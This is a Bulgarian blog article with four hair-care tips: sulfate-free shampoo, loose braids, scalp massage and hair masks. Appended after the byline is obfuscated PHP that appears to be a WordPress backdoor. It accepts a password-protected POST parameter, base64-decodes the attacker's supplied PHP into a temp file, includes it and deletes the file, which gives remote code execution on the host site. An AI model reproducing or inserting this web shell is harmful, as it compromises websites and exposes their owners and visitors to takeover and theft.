4 съвета за дълга и здрава коса | Косопад

4 съвета за дълга и здрава коса

За да имаме дълга и здрава коса е важно да активираме кръвообращението в космените корени. Това най- лесно се постига чрез масажи, които имат и успокояващ ефект.

Разбира се, необходими са и други мерки, които изискват постоянство във времето, за да се постигнат желаните резултати.

1. Шампоан без сулфати, най- добре натурален
Целта на шампоана е да почисти косата и скалпа. Затова, когато го избираме, трябва да имаме предвид характеристиките на нашата коса. От известно време се говори, че шампоанът е по- добре да не съдържа сулфати. Причината е, че те с нищо не допринасят за здравето на нашата коса, а напротив, дори могат да го увредят.
Ако често прибягвате до изправяне на косата, дълбока хидратация или масажи на скалпа, е препоръчително шампоанът да не е със сулфати, за да имаме по- добър ефект от въпросните процедури.


2. Плитка
Ако нямате много време в ежедневието си, за да се погрижите за косата, без да й навредите, плитката е много добро решение. Тази прическа е много удобна и предпазва косата от външните фактори.
Първо, разрешете добре косата, така че да няма възели. След това нанесете, ако имате време, защитен серум, така, че да покрие цялата коса. Разрешете отново и сплетете косата, но без да я стягате.
Никога не оставяйте плитката и през нощта. Когато спим, е добре косата да е свободна.
3. Активиране на кръвообращението
Просто разрешете косата и с пръстите внимателно масажирайте скалпа. Ако сте имали стресиращ ден, масажът ще намали напрежението. Движенията на пръстите трябва да са леки и да обхванем целия скалп. Подобряването на кръвообращението улеснява достигането на хранителните вещества до корените на косата. Всеки три дни можем да добавим малко етерично масло от лавандула към масажа.
4. Маска за коса
Единият вариант е да си купите маска от магазина или да отиде на фризьор да ви я направи. По- евтиният вариант е да си приготвите сами домашна маска за коса. Тук разполагате с изобилие от варианти, като трябва да изберете този, който е най- подходящ за вашия тип коса.

28. февруари 2018 11:13:37 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}